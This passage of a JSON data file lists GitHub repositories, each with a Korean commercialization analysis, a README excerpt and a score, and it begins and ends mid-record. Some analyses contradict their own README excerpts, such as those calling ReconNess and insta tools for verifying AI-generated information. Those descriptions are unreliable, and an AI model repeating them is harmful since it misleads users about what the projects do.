Logo](https://raw.githubusercontent.com/apache/shenyu-website/main/static/img/logo.svg#gh-light-mode-only)\n\n<p align=\"center\">\n  <strong>Scalable, High Performance, Responsive API Gateway Solution for all MicroServices</strong>\n</p>\n<p align=\"center\">\n  <a href=\"https://shenyu.apache.org/\">https://shenyu.apache.org/</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://shenyu.apache.org/docs/index\" >\n    <img src=\"https://img.shields.io/badge/document-English-blue.svg\" alt=\"EN docs\" />\n  </a>\n  <a href=\"https://shenyu.apache.org/zh/docs/index\">\n    <img src=\"https://img.shields.io/badge/文档-简体中文-blue.svg\" alt=\"简体中文文档\" />\n  </a>\n</p>\n\n<p align=\"center\">\n    <a target=\"_blank\" href=\"https://search.maven.org/search?q=g:org.apache.shenyu%20AND%20a:shenyu\">\n        <img src=\"https://img.shields.io/maven-central/v/org.apache.shenyu/shenyu.svg?label=maven%20central\" />\n    <","composite_score":0.1217,"license_safety_tag":"safe"},{"name":"microsoft/gctoolkit","github_url":"https://github.com/microsoft/gctoolkit","stars":12,"language":"Java","license":"MIT","abandonment_months":0,"description":"# microsoft/gctoolkit 상용화 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 공식 도구로, 컴퓨터 성능 최적화에 필요한 데이터를 쉽게 분석할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 컴퓨터 성능을 원격으로 모니터링하고 최적화 방안을 자동 제시하는 구독 서비스\n2. **내부 업무 도구**: 대기업 ","readme_excerpt":"# Microsoft GCToolKit\n\nGCToolkit is a set of libraries for analyzing HotSpot Java garbage collection (GC) log files. The toolkit parses GC log files into discrete events and provides an API for aggregating data from those events. This allows the user to create arbitrary and complex analyses of the state of managed memory in the Java Virtual Machine (JVM) represented by the garbage collection log.\n\nFor more detail you can read our [Launch Blog Post](https://devblogs.microsoft.com/java/introducing-microsoft-gctoolkit/).\n\n[![GCToolKit build with Maven](https://github.com/microsoft/gctoolkit/actions/workflows/maven.yml/badge.svg)](https://github.com/microsoft/gctoolkit/actions/workflows/maven.yml)\n\n---\n\n## Introduction\n\nManaged memory in the Java Virtual Machine (JVM) is composed of 3 main pieces:\n\n1. Memory buffers known as Java heap\n1. Allocators which perform the work of getting data into Java heap\n1. Garbage Collection (GC).\n\nWhile GC is responsible for recovering memory in Java heap t","composite_score":0.1217,"license_safety_tag":"safe"},{"name":"OpenSLO/OpenSLO","github_url":"https://github.com/OpenSLO/OpenSLO","stars":12,"language":"Makefile","license":"Apache-2.0","abandonment_months":6,"description":"# OpenSLO 분석 보고서\n\n## 왜 보물인가\n온라인 서비스가 얼마나 잘 작동하는지를 표준화된 방식으로 측정하고 관리할 수 있는 오픈소스 도구로, 모든 기업이 서비스 품질을 일관되게 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 서비스 업체의 SaaS 대시보드**: 고객들이 자신의 서비스 안정성을 실시간으로 모니터링하고 리포트","readme_excerpt":"#\n\n<!-- markdownlint-disable MD033-->\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"images/openslo_light.png\">\n  <img alt=\"OpenSLO light theme\" src=\"images/openslo.png\">\n</picture>\n<!-- markdownlint-enable MD033-->\n\n## Table of Contents\n\n- [Introduction](#introduction)\n- [Specification](#specification)\n  - [Goals](#goals)\n  - [General Schema](#general-schema)\n    - [Notes (General Schema)](#notes-general-schema)\n  - [Custom Data Types](#custom-data-types)\n    - [duration-shorthand](#duration-shorthand)\n  - [Object Types](#object-types)\n    - [DataSource](#datasource)\n      - [Notes (DataSource)](#notes-datasource)\n    - [SLO](#slo)\n      - [Notes (SLO)](#notes-slo)\n      - [Objectives](#objectives)\n        - [Notes (Objectives)](#notes-objectives)\n    - [SLI](#sli)\n      - [Notes (SLI)](#notes-sli)\n      - [Ratio Metric](#ratio-metric)\n    - [AlertPolicy](#alertpolicy)\n      - [Notes (AlertPolicy)](#notes-alertpolicy)\n    - [AlertCondition](#alertcondition)\n      - [","composite_score":0.1215,"license_safety_tag":"safe"},{"name":"deepmind/alphafold","github_url":"https://github.com/deepmind/alphafold","stars":12,"language":"Python","license":"apache-2.0","abandonment_months":1,"description":"# AlphaFold 저장소 분석\n\n## 왜 보물인가\n단백질의 3차원 구조를 AI로 자동 예측해주는 기술로, 신약 개발과 질병 연구에 걸리던 수개월의 시간을 며칠로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **신약 개발 플랫폼 SaaS**: 제약사들이 후보 물질의 단백질 구조를 빠르게 분석하고 효과를 예측하는 웹 서비스\n2. **대학·연구기관 ","readme_excerpt":"![header](imgs/header.jpg)\n\n# AlphaFold\n\nThis package provides an implementation of the inference pipeline of AlphaFold\nv2. For simplicity, we refer to this model as AlphaFold throughout the rest of\nthis document.\n\nWe also provide:\n\n1.  An implementation of AlphaFold-Multimer. This represents a work in progress\n    and AlphaFold-Multimer isn't expected to be as stable as our monomer\n    AlphaFold system. [Read the guide](#updating-existing-installation) for how\n    to upgrade and update code.\n2.  The [technical note](docs/technical_note_v2.3.0.md) containing the models\n    and inference procedure for an updated AlphaFold v2.3.0.\n3.  A [CASP15 baseline](docs/casp15_predictions.zip) set of predictions along\n    with documentation of any manual interventions performed.\n\nAny publication that discloses findings arising from using this source code or\nthe model parameters should [cite](#citing-this-work) the\n[AlphaFold paper](https://doi.org/10.1038/s41586-021-03819-2) and, if\napplicable, the","composite_score":0.1215,"license_safety_tag":"safe"},{"name":"rails-api/active_model_serializers","github_url":"https://github.com/rails-api/active_model_serializers","stars":5,"language":"Ruby","license":"mit","abandonment_months":6,"description":"# Active Model Serializers 분석\n\n## 왜 보물인가\n웹 서비스에서 데이터를 주고받을 때 필요한 정보만 깔끔하게 정렬해주는 도구로, 개발자들의 반복 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 백엔드 서비스**: 스마트폰 앱과 서버 간 데이터 송수신을 빠르고 효율적으로 처리하는 API 구축\n2. **대시보드 시","readme_excerpt":"# ActiveModelSerializers\n\n## About\n\nActiveModelSerializers is undergoing some renovations. See [Development Status](#status-of-ams).\n\n## Getting Help\n\nIf you find a bug, please report an [Issue](https://github.com/rails-api/active_model_serializers/issues/new)\nand see our [contributing guide](CONTRIBUTING.md).\n\nIf you have a question, please [post to Stack Overflow](http://stackoverflow.com/questions/tagged/active-model-serializers).\n\nIf you'd like to chat, we have a [community slack](http://amserializers.herokuapp.com).\n\nThanks!\n\n## Documentation\n\nIf you're reading this at https://github.com/rails-api/active_model_serializers you are\nreading documentation for our `master`, which is not yet released.\n\n<table>\n  <tr>  \n    <td>\n      <a href='https://github.com/rails-api/active_model_serializers/tree/0-10-stable'>0.10 (0-10-stable) Documentation\n      </a>\n    </td>\n    <td>\n      <a href='http://www.rubydoc.info/gems/active_model_serializers/0.10.6'>\n        <img src='http://img.shield","composite_score":0.1214,"license_safety_tag":"safe"},{"name":"ssh-mitm/ssh-mitm","github_url":"https://github.com/ssh-mitm/ssh-mitm","stars":13,"language":"Python","license":"GPL-3.0","abandonment_months":0,"description":"# SSH-MITM 저장소 평가\n\n## 왜 보물인가\n인터넷 통신 보안을 감시하고 검사할 수 있는 핵심 기술로, 기업의 데이터 유출 방지와 네트워크 보안 감시에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 모니터링 SaaS**: 회사 직원들의 외부 서버 접속을 안전하게 감시하고 기록하는 클라우드 서비스\n2. **내부 IT 운영 도구**","readme_excerpt":"<h1 align=\"center\"> SSH-MITM - ssh audits made simple </h1>\n<p align=\"center\">\n  <a href=\"https://github.com/ssh-mitm/ssh-mitm\">\n    <img alt=\"SSH-MITM intercepting password login\" title=\"SSH-MITM\" src=\"https://docs.ssh-mitm.at/_images/intro.png\" >\n  </a>\n  <p align=\"center\">An interactive SSH interception tool for authorized security audits.<br>Intercept sessions, monitor live traffic, inject commands, and manipulate file transfers — all in real time.</p>\n  <p align=\"center\">\n   <a href=\"https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage\"><img height='56' alt='Download as an AppImage' src='https://docs.appimage.org/_images/download-appimage-banner.svg'/></a>\n   &nbsp;&nbsp;&nbsp;\n   <a href=\"https://flathub.org/apps/at.ssh_mitm.server\"><img height='56' alt='Download on Flathub' src='https://dl.flathub.org/assets/badges/flathub-badge-en.png'/></a>\n   &nbsp;&nbsp;&nbsp;\n   <a href=\"https://snapcraft.io/ssh-mitm\"><img  height='56' alt=\"Get it from the ","composite_score":0.1213,"license_safety_tag":"restricted"},{"name":"cs01/termpair","github_url":"https://github.com/cs01/termpair","stars":9,"language":"Rust","license":"MIT","abandonment_months":2,"description":"# cs01/termpair 분석 보고서\n\n## 왜 보물인가\n터미널(검은 화면)에서 여러 사람이 실시간으로 협력할 수 있는 도구로, 원격 업무나 기술 지원이 필요한 모든 조직에서 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: IT 기술 지원 회사가 고객 문제 해결 시 \"실시간 화면 공유 플랫폼\"으로 구독 판매  \n**2.","readme_excerpt":"<p align=\"center\">\n<img src=\"logo.svg\" width=\"300\" alt=\"TermPair\"/>\n<br><br>\nView and control remote terminals from your browser with end-to-end encryption\n<br><br>\n</p>\n\n<p align=\"center\">\n<img src=\"termpair_share.png\" width=\"500\" alt=\"termpair share command\"/>\n</p>\n<p align=\"center\">\n<img src=\"termpair_browser.png\" width=\"600\" alt=\"termpair browser view\"/>\n</p>\n\n## Why TermPair?\n\n* **Zero-knowledge sharing** -- your terminal is end-to-end encrypted (AES-128-GCM). The server is a blind relay that never sees your data.\n* **One command to share** -- run `termpair share`, send the link. Anyone with the link watches your terminal live in their browser.\n* **Let others type** -- viewers can type in your terminal from the browser, or set `--read-only` to keep them watching.\n* **Public or private** -- private sessions are encrypted and link-only. Public sessions (`--public`) are listed on the landing page for anyone to discover and watch.\n* **Survive server restarts** -- if the server goes do","composite_score":0.1209,"license_safety_tag":"safe"},{"name":"mrjbq7/ta-lib","github_url":"https://github.com/mrjbq7/ta-lib","stars":5,"language":"Cython","license":"BSD-2-Clause","abandonment_months":2,"description":"# ta-lib 저장소 분석\n\n## 왜 보물인가\n주식과 암호화폐 가격 변동을 자동으로 분석해주는 도구로, 투자 판단을 빠르고 정확하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **주식 자동 거래 플랫폼**: 사용자가 투자 규칙을 정하면 자동으로 매매하는 웹 서비스\n2. **투자 앱 API**: 주식 차트 분석 기능이 필요한 모바일 앱에 기술 판매","readme_excerpt":"# TA-Lib 📈\n\n<!-- Badges -->\n![Tests](https://github.com/ta-lib/ta-lib-python/actions/workflows/tests.yml/badge.svg)\n[![Release](https://img.shields.io/github/v/release/ta-lib/ta-lib-python?label=Release)](https://github.com/ta-lib/ta-lib-python/releases)\n[![PyPI](https://img.shields.io/pypi/v/TA-Lib?label=PyPI)](https://pypi.org/project/TA-Lib/)\n[![Wheels](https://img.shields.io/pypi/wheel/TA-Lib?label=Wheels)](https://pypi.org/project/TA-Lib/#files)\n[![Python Versions](https://img.shields.io/pypi/pyversions/TA-Lib?label=Python)](https://pypi.org/project/TA-Lib/)\n[![License](https://img.shields.io/badge/License-BSD%202--Clause-blue.svg)](https://opensource.org/licenses/BSD-2-Clause)\n\nThis is a Python wrapper for [TA-LIB](http://ta-lib.org) based on Cython\ninstead of SWIG. From the homepage:\n\n> TA-Lib is widely used by trading software developers requiring to perform\n> technical analysis of financial market data.\n>\n> * Includes 150+ indicators such as ADX, MACD, RSI, Stochastic, Bolling","composite_score":0.1208,"license_safety_tag":"safe"},{"name":"mereses-labs/solana-pumpfun-bundler","github_url":"https://github.com/mereses-labs/solana-pumpfun-bundler","stars":193,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.1204,"license_safety_tag":"unknown"},{"name":"meetfranz/franz","github_url":"https://github.com/meetfranz/franz","stars":13,"language":"JavaScript","license":"apache-2.0","abandonment_months":8,"description":"# Franz 저장소 분석\n\n## 왜 보물인가\n여러 메신저 앱을 하나의 화면에서 통합 관리할 수 있는 솔루션으로, 업무 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 메신저 통합 플랫폼으로 직장인들에게 월정액 구독 판매\n2. **내부 업무 도구**: 기업의 IT 팀이 직원들의 커뮤니케이션 도구를 한 곳에서","readme_excerpt":"<img src=\"./build-helpers/images/icon.png\" alt=\"\" width=\"150\"/>\n\n# Franz 5\n[![Build status Windows](https://ci.appveyor.com/api/projects/status/9yman4ye19x4274o/branch/master?svg=true)](https://ci.appveyor.com/project/adlk/franz/branch/master)\n [![Build Status Mac & Linux](https://travis-ci.com/meetfranz/franz.svg?branch=master)](https://travis-ci.com/meetfranz/franz) [![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://meetfranz.com/payment.html)\n\nMessaging app for WhatsApp, Slack, Telegram, HipChat, Hangouts and many many more.\n\n## [Download Franz](https://www.meetfranz.com)\n👉 www.meetfranz.com\n\n### Or use homebrew (macOS only)\n\n`$ brew cask install franz`\n\n(Don't know homebrew? [brew.sh](https://brew.sh/))\n\n## Development\n\n### Preparations\n\n#### Install Linux OS dependencies\n[Guide: Linux distribution specific dependencies](docs/linux.md)\n\n#### Fix native modules to match current electron node version\n```bash\n$ npm run rebuild\n```\n\n### Install dependencies\nRun t","composite_score":0.1203,"license_safety_tag":"safe"},{"name":"reconness/reconness","github_url":"https://github.com/reconness/reconness","stars":8,"language":"C#","license":"MIT","abandonment_months":1,"description":"# Reconness 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 정보의 정확성을 자동으로 검증하는 기술로, 신뢰할 수 없는 AI 답변으로 인한 피해를 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 챗봇이나 AI 고객 상담 플랫폼에 내장하여 부정확한 정보 제공을 사전 차단\n2. **내부 업무 도구**: 기업의 AI 기반 ","readme_excerpt":"# ReconNess Web App\n\n[![Build Status](https://dev.azure.com/reconness/reconness/_apis/build/status/reconness.reconness?branchName=master)](https://dev.azure.com/reconness/reconness/_build/latest?definitionId=1&branchName=master)\n<a href=\"https://twitter.com/reconness\"><img src=\"https://img.shields.io/twitter/follow/reconness?logo=twitter&??style=flat-square&logo=appveyor\"></a>\n<p align=\"center\">\n  <img width=\"300\" height=\"300\" src=\"logo.png\">\n</p>\n\n## Why ReconNess?\n\nWell, we have seen a lot of #bugbounty hackers organizing his #recon using txt and doing a lot of bash scripts to filter the output to keep everything organized with the intention to focus only on the potentially vulnerable targets. But realistically this demands a lot of bash skill and strong folders/files organization process to avoid the feeling of chaos.\n\nReconNess helps you to run and keep all your #recon in the same place allowing you to focus only on the potentially vulnerable targets without distraction and without","composite_score":0.12,"license_safety_tag":"safe"},{"name":"ret2got/disasm.pro","github_url":"https://github.com/ret2got/disasm.pro","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":10,"description":"# ret2got/disasm.pro 평가 보고서\n\n## 왜 보물인가\n컴퓨터 프로그램의 내부 동작을 분석하는 도구로, 보안 연구자와 소프트웨어 개발자가 악성코드를 탐지하거나 버그를 찾는 데 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 검사 SaaS**: 기업의 소프트웨어가 안전한지 자동으로 검사해주는 클라우드 서비스로 제공\n2. **악성코","readme_excerpt":"# disasm.pro\nFormerly known as disasm.ninja, It's a multi-architecture realtime assembler/disassembler with line-to-line correlation. A live version is currently up at https://disasm.pro/\n\n# What and Why\nIt is basically a nice frontend of my [keystone](https://github.com/ret2got/keystone) fork (for line-to-line assembling) and [capstone](https://github.com/aquynh/capstone). I don't normally do frontend development but I wanted something for quickly analyzing tiny snippets of code (mostly during CTFs) and shellcoding, which led to this. \n\nI know there are other online assemblers/disassemblers out there, but none of them fit my exact needs. \n\n# Support\nIt currently supports 5 architectures:\n\n- x86/64\n- ARMv8\n- MIPS\n- Sparc\n- PowerPC\n\nMost typical assembler directives are also supported. Macros are not fully supported. \n\n# Installation\n\nTo Install and run it locally: \n\n- Git clone with submodules\n\n```\ngit clone https://github.com/ret2got/disasm.pro.git --recursive\ncd disasm.pro\n```\n\n- Bui","composite_score":0.1198,"license_safety_tag":"unknown"},{"name":"mitsuhiko/insta","github_url":"https://github.com/mitsuhiko/insta","stars":7,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# mitsuhiko/insta 상용화 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 정보의 정확성을 자동으로 검증해주는 기술로, 거짓 정보로 인한 피해를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객 지원 챗봇 SaaS**: 은행이나 보험사의 자동 상담 시스템에 내장하여 잘못된 상품 정보 제공 방지\n2. **의료 정보 검색 플랫폼**: 의","readme_excerpt":"<div align=\"center\">\n <img src=\"https://github.com/mitsuhiko/insta/blob/master/assets/logo.png?raw=true\" width=\"250\" height=\"250\">\n <p><strong>insta: a snapshot testing library for Rust</strong></p>\n</div>\n\n[![Crates.io](https://img.shields.io/crates/d/insta.svg)](https://crates.io/crates/insta)\n[![License](https://img.shields.io/github/license/mitsuhiko/insta)](https://github.com/mitsuhiko/insta/blob/master/LICENSE)\n[![Documentation](https://docs.rs/insta/badge.svg)](https://docs.rs/insta)\n[![VSCode Extension](https://img.shields.io/visual-studio-marketplace/v/mitsuhiko.insta?label=vscode%20extension)](https://marketplace.visualstudio.com/items?itemName=mitsuhiko.insta)\n\n## Introduction\n\nSnapshots tests (also sometimes called approval tests) are tests that\nassert values against a reference value (the snapshot). This is similar\nto how `assert_eq!` lets you compare a value against a reference value but\nunlike simple string assertions, snapshot tests let you test against complex\nvalues a","composite_score":0.1195,"license_safety_tag":"safe"},{"name":"aws-cloudformation/cloudformation-guard","github_url":"https://github.com/aws-cloudformation/cloudformation-guard","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# AWS CloudFormation Guard 분석 보고서\n\n## 왜 보물인가\n클라우드 인프라 설정이 안전하고 정책을 따르는지 자동으로 검사해주는 도구로, 기업의 클라우드 보안 사고를 미리 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 보안 점검 SaaS**\n- 기업이 AWS 인프라를 설정할 때마다 자동으로 보안 규칙 위반 여부를 검","readme_excerpt":"# AWS CloudFormation Guard\n\n**Validate Cloud Environments with Policy-as-Code**\n\nAWS CloudFormation Guard is an open-source general-purpose policy-as-code evaluation tool. It provides developers with a simple-to-use, yet powerful and expressive domain-specific language (DSL) to define policies and enables developers to validate JSON- or YAML- formatted structured data with those policies.\n\nThe Guard 3.0 release introduces support for stateful rules through built-in functions, SAM CLI as an alternative deployment method for `cfn-guard-lambda`, command auto-completions for shell, advanced regular expressions, improved handling of intrinsic functions for the test command, as well as the `--structured` flag to the validate command to emit JSON/YAML parseable output. Note that previously written tests may have to be reviewed due to the corrected behavior of intrinsic function handling. Please see the release notes for full details and examples.\n\nGuard can be used for the following domains:\n","composite_score":0.1194,"license_safety_tag":"safe"},{"name":"Jeffail/benthos","github_url":"https://github.com/Jeffail/benthos","stars":7,"language":"Go","license":"mit","abandonment_months":0,"description":"# Benthos 저장소 분석\n\n## 왜 보물인가\n여러 데이터 소스를 자동으로 연결하고 정보를 실시간으로 변환·전달하는 핵심 기술로, 기업의 데이터 흐름을 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사의 각종 업무 시스템(회계, CRM, 재고 등)을 자동 연동하는 통합 플랫폼\n2. **내부 업무 도구**: 회사 내 ","readme_excerpt":"Redpanda Connect\n================\n\n[![Build Status][actions-badge]][actions-url]\n\nAPI for Apache V2 builds: [![godoc for redpanda-data/connect ASL][godoc-badge]][godoc-url-apache]\n\nAPI for Enterprise builds: [![godoc for redpanda-data/connect RCL][godoc-badge]][godoc-url-enterprise]\n\nRedpanda Connect is a high performance and resilient stream processor, able to connect various [sources][inputs] and [sinks][outputs] in a range of brokering patterns and perform [hydration, enrichments, transformations and filters][processors] on payloads.\n\nIt comes with a [powerful mapping language][bloblang-about], is easy to deploy and monitor, and ready to drop into your pipeline either as a static binary or docker image, making it cloud native as heck.\n\nRedpanda Connect is declarative, with stream pipelines defined in as few as a single config file, allowing you to specify connectors and a list of processing stages:\n\n```yaml\ninput:\n  gcp_pubsub:\n    project: foo\n    subscription: bar\n\npipeline:\n  pro","composite_score":0.1193,"license_safety_tag":"safe"},{"name":"persepolisdm/persepolis","github_url":"https://github.com/persepolisdm/persepolis","stars":5,"language":"Python","license":"gpl-3.0","abandonment_months":8,"description":"# Persepolis 다운로드 매니저 상용화 분석\n\n## 왜 보물인가\n인터넷에서 파일을 받을 때 속도를 높이고 안정성을 개선하는 무료 오픈소스 도구로, 기업들이 이를 개선해 유료 서비스로 판매할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 클라우드 다운로드 서비스**\n대용량 파일을 여러 경로로 동시에 받아 속도를 10배 이상 높이는 구독형","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://persepolisdm.github.io/img/screen/persepolisـreadme.png\" width=\"128px\"/>\n</p>\n<h1 align=\"center\">Persepolis Download Manager</h1>\n\n[![Latest stable release](https://img.shields.io/github/release/persepolisdm/persepolis.svg?maxAge=3600)](https://github.com/persepolisdm/persepolis/releases) [![Total downloads](https://img.shields.io/github/downloads/persepolisdm/persepolis/total.svg)](https://github.com/persepolisdm/persepolis) [![GitHub license](https://img.shields.io/github/license/persepolisdm/persepolis.svg)](https://github.com/persepolisdm/persepolis/blob/master/LICENSE) [![Build Status](https://travis-ci.org/persepolisdm/persepolis.svg?branch=master)](https://travis-ci.org/persepolisdm/persepolis) [![GitHub last commit](https://img.shields.io/github/last-commit/persepolisdm/persepolis.svg)](https://github.com/persepolisdm/persepolis/commits/master) [![GitHub contributors](https://img.shields.io/github/contributors/persepolisdm/persepolis.svg)]","composite_score":0.1192,"license_safety_tag":"restricted"},{"name":"dae/anki","github_url":"https://github.com/dae/anki","stars":5,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"# dae/anki 상용화 분석\n\n## 왜 보물인가\n반복 학습을 과학적으로 최적화해주는 오픈소스 프로젝트로, 전 세계 수백만 학생과 직장인들이 효율적으로 암기하고 지식을 유지하는 데 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼 SaaS**\n기존 강의 플랫폼에 \"과학적 반복 학습\" 기능을 추가하여 학생들의 장기 기억 형성율을 ","readme_excerpt":"# Anki\n\n[![Build Status](https://github.com/ankitects/anki/actions/workflows/ci.yml/badge.svg)](https://github.com/ankitects/anki/actions/workflows/ci.yml)\n[![Documentation](https://img.shields.io/badge/docs-dev--docs.ankiweb.net-blue)](https://dev-docs.ankiweb.net)\n\nThis repo contains the source code for the computer version of\n[Anki](https://apps.ankiweb.net).\n\n# About\n\nAnki is a spaced repetition program. Please see the [website](https://apps.ankiweb.net) to learn more.\n\nThis repo contains the source code for the computer version of\n[Anki](https://apps.ankiweb.net).\n\n## Getting Started\n\n### Contributing\n\nWant to contribute to Anki? Check out the [Contribution Guidelines](./docs/contributing.md).\n\nFor more information on building and developing, please see [Development](./docs/development.md).\n\n#### Contributors\n\nThe following people have contributed to Anki: [CONTRIBUTORS](./CONTRIBUTORS)\n\n### Anki Betas\n\nIf you'd like to try development builds of Anki but don't feel comfortable\nbui","composite_score":0.119,"license_safety_tag":"unknown"},{"name":"dawnlabs/carbon","github_url":"https://github.com/dawnlabs/carbon","stars":7,"language":"JavaScript","license":"mit","abandonment_months":3,"description":"# Carbon 저장소 분석\n\n## 왜 보물인가\n코드를 예쁜 이미지로 변환해주는 도구로, 개발자들이 소셜 미디어나 문서에서 코드를 멋지게 공유할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자용 웹사이트에서 \"코드를 이미지로 변환\" 기능을 월 구독으로 제공\n2. **내부 업무 도구**: 개발팀이 코드 리뷰 문서나 기술 ","readme_excerpt":"<p align=\"center\">\n  <img width=\"100%\" src=\"https://user-images.githubusercontent.com/10369094/31211729-591d059c-a950-11e7-86af-fa5ea3d7dbac.png\" />\n</p>\n\n<p align=\"center\">\n  <a href=\"https://reporanger.com\">\n    <img src=\"https://img.shields.io/badge/maintained%20with-Ranger-1f93f3.svg\" alt=\"maintained with Ranger\" />\n  </a>\n  <a href=\"#contributors\">\n    <img src=\"https://img.shields.io/badge/all_contributors-160-orange.svg\" alt=\"All Contributors\" />\n  </a>\n  <a href=\"/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/carbon-app/carbon.svg\" alt=\"MIT License\" />\n  </a>\n  <a href=\"https://app.fossa.io/projects/git%2Bgithub.com%2Fcarbon-app%2Fcarbon?ref=badge_shield\">\n    <img src=\"https://app.fossa.io/api/projects/git%2Bgithub.com%2Fcarbon-app%2Fcarbon.svg?type=shield\" alt=\"FOSSA Status\" />\n  </a>\n</p>\n\n<br></br>\n\n##### Translations\n\n<table>\n  <tbody>\n    <tr>\n      <td>\n        <a href=\"/docs/README.es.md\">Español</a>\n      </td>\n      <td>\n        <a href=\"/docs/README.h","composite_score":0.119,"license_safety_tag":"safe"},{"name":"idea4good/GuiLite","github_url":"https://github.com/idea4good/GuiLite","stars":5,"language":"C++","license":"apache-2.0","abandonment_months":7,"description":"# GuiLite 상용화 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이도 화면 인터페이스를 만들 수 있는 가벼운 도구로, 특히 임베디드 기기나 저사양 환경에서 전문적인 UI를 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 산업용 기계 원격 관리 플랫폼**\n제조업체들이 자신의 기계를 어디서나 제어할 수 있는 클라우드 기반 서비","readme_excerpt":"# Welcome to GUI-lite\n<p align=\"center\">\n    <img src=\"documents/logo.png\" alt=\"Logo\"/>\n</p>\n<p align=\"center\">\n  <img src=\"https://img.shields.io/badge/build-passing-brightgreen.svg\">\n  <img src=\"https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20macOS%20%7C%20iOS%20%7C%20Android%20%7C%20MCU-brightgreen.svg\">\n  <img src=\"https://img.shields.io/badge/architecture-amd64%20%7C%20arm%20%7C%20arm64-blue.svg\">\n  <img src=\"https://img.shields.io/badge/license-Apache%202-blue.svg\">\n</p>\n<p align=\"center\">The smallest header-only GUI library (4 KLOC) for all platforms.</p>\n<p align=\"center\">\n    <img src=\"documents/WhyGuiLite.png\" alt=\"Why GuiLite\"/>\n</p>\n\n- [中文](README_zh.md)\n\n## Lightweight\n- ✂️Small: 4,000+ lines of C++ code, zero dependency, header-only(GuiLite.h)\n- ⚡Fast: High Rendering performance, even work on MCU\n- 👫🏻Compatible: Work smoothly with 3rd party frameworks(Qt/MFC/Winform/Cocoa/Web)\n- ⚙️️Hardware Minimum Requirements:\n\n    | Processor | Disk/ROM space | Memo","composite_score":0.1188,"license_safety_tag":"safe"},{"name":"tensorflow/decision-forests","github_url":"https://github.com/tensorflow/decision-forests","stars":11,"language":"Python","license":"apache-2.0","abandonment_months":2,"description":"# TensorFlow Decision Forests 상용화 분석\n\n## 왜 보물인가\n구글이 만든 의사결정 나무 AI를 쉽게 사용할 수 있어서, 은행·보험·의료 같은 신뢰성이 중요한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 신용평가 SaaS**\n은행과 금융사가 대출 승인 여부를 자동으로 판단하는 웹 서비스로 월 구독 판매\n\n**","readme_excerpt":"<p align=\"center\">\n<img src=\"documentation/image/logo.png\"  />\n</p>\n\n> **Note:** We recommend users to migrate to **Yggdrasil Decision Forests**\n> (**YDF**). YDF trains the same models as TF-DF, but is faster and has more\n> functionality. See the\n> [migration guide](https://ydf.readthedocs.io/en/latest/tutorial/migrating_to_ydf/)\n> for more information.\n\n**TensorFlow Decision Forests** (**TF-DF**) is a library to train, run and\ninterpret [decision forest](https://ydf.readthedocs.io/en/latest/intro_df.html)\nmodels (e.g., Random Forests, Gradient Boosted Trees) in TensorFlow. TF-DF\nsupports classification, regression and ranking.\n\n**TF-DF** is powered by\n[Yggdrasil Decision Forest](https://github.com/google/yggdrasil-decision-forests)\n(**YDF**, a library to train and use decision forests in C++, JavaScript, CLI,\nand Go. TF-DF models are\n[compatible](https://ydf.readthedocs.io/en/latest/convert_model.html#convert-a-a-tensorflow-decision-forests-model-to-a-yggdrasil-model)\nwith YDF' models","composite_score":0.1185,"license_safety_tag":"safe"},{"name":"Alchemz/solana-pumpfun-token-bundler","github_url":"https://github.com/Alchemz/solana-pumpfun-token-bundler","stars":148,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1183,"license_safety_tag":"unknown"},{"name":"VAENPP/solana-trading-bot","github_url":"https://github.com/VAENPP/solana-trading-bot","stars":149,"language":"TypeScript","license":"MS-PL","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1181,"license_safety_tag":"unknown"},{"name":"chimurai/http-proxy-middleware","github_url":"https://github.com/chimurai/http-proxy-middleware","stars":7,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# http-proxy-middleware 상용화 분석\n\n## 왜 보물인가\n웹사이트 간 데이터 중개 역할을 자동으로 처리해주는 기술로, 기업들이 여러 서비스를 안전하게 연결할 때 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **API 통합 플랫폼 SaaS**: 중소기업들이 여러 외부 서비스(결제, 배송, 회계)를 한곳에서 관리하는 통합 대시보드 